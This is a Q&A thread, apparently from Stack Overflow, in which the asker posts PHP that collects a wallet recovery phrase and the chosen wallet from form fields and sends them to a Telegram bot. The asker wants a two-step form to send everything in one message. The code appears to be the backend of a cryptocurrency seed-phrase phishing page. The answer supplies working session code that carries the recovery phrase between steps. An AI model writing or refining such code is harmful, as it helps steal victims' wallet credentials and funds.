# Send values ​to Telegram

Tags: php

```
<?php
if (!empty($_POST)) {
    class Telegram
    {

        const CHAT_ID = ;
        const TOKEN = '';

        public static function sendMessage($message)
        {
            $url = "https://api.telegram.org/bot" . self::TOKEN . "/sendMessage?chat_id=" . self::CHAT_ID;
            $url = $url . "&text=" . urlencode($message);
            $ch = curl_init();
            $optArray = array(
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true
            );
            curl_setopt_array($ch, $optArray);
            $result = curl_exec($ch);
            curl_close($ch);
        }

    }
    $message=' New'
        . "\n" . '---------------'
        . "\n" . 'Wallet:' . $_POST['recovreyphrase']
        . "\n" . 'Selected wallet' . $_POST['wall']
        . "\n" . 'selected Digital: ' . $_POST['select'];
    Telegram::sendMessage($message);
}

?>
```

Hello friends, this is my code
I want to send values ​​to Telegram through two forms
Everything is fine but
But in two new messages it is sent to Telegram. I want all values ​​to be sent in one message

Comment: What do you mean by "through two forms"?

Comment: @Progman I first set the user values $_POST['recovreyphrase'] and $_POST['select'] And I send then the amount $_POST['select']

Comment: @hprogrammer it's totally  unclear what you are asking about... your code should send one message. Your comment doesn't help - why are you setting first something and then seomething? Are you posting 2 times? what do you expect to happen? what is the result now?

Comment: @FlashThunder This is a multi-step form that receives values ​​from the user in two steps

Comment: Please post _all_ relevant code including a _detailed_ explanation of the flow and what you expect to happen and what currently happens. Read through [How do I ask a good question](https://stackoverflow.com/help/how-to-ask) and edit your question accordingly.

Comment: @FlashThunder See, this is my JavaScript code

Comment: @hprogrammer can't see

Answer (score 0):

Multi-step form should be realized in JavaScript. But if you don't want to make a site dynamic, there could be multiple approaches. One of them would be to pass the values from one step to another by `$_SESSION`, for example like this:

`step1.php` (please note that `header()` has to be used `BEFORE` returning any content, so this script should be in top of `HTML` code):

```
<?php
   session_start(); // don't forget to start the session, or it won't work!
   ...
   if (!empty($_POST)) {
      $_SESSION['step1'] = $_POST;
      header('Location: step2.php'); // redirect to step2 if posted something
   }
?>
```

In `step2.php` you can access the values saved in session (in `step1.php`) like this:

```
<?php
   session_start();
   ...
   $wall = $_SESSION['step1']['wall'] ?? null; // if doesn't exist, set to null (PHP7+)
   $recovreyphrase = $_SESSION['step1']['recovreyphrase'] ?? null;
   unset($_SESSION['step1']) // remove it from the session, so it wouldn't stay there forever
   // altearnatively you could use `session_unset()` to clear everything in the current session
?>
```